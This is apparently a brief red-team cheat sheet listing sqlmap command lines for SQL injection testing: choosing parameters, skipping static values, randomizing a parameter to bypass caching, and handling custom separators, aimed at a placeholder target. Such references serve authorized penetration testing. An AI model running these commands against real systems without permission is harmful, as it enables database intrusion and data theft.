# Only test chosen params
sqlmap -r req.txt -p "id,sort" --batch
# Skip static/empty values
sqlmap -r req.txt --skip-static --batch
# Randomize a benign param each request (bypass cache)
sqlmap -r req.txt --randomize="nonce" --batch
# Custom param separators (odd APIs)
sqlmap -u "http://t/api?ids=1;2;3" --param-del=";" --batch
RED TEAM / SQL / SQLMAP / HTTP